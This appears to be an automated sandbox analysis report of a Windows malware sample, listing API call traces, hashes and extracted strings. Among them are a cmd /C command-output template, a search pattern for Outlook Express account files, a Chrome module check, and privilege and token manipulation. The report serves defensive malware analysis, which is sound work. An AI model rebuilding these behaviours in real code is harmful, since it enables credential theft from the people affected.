  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:AD7B9C14083B52BC532FBA5948342B98
Total matches:133
Initial Analysis Report:Open
Initial sample Analysis ID:53359
Initial sample SHA 256:CCABD8DAE39FBEF5B91051EB9A38E9C3B93CB9952B399D6F9F2B6C3F406FC979
Initial sample name:q0JgDgMXw4.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
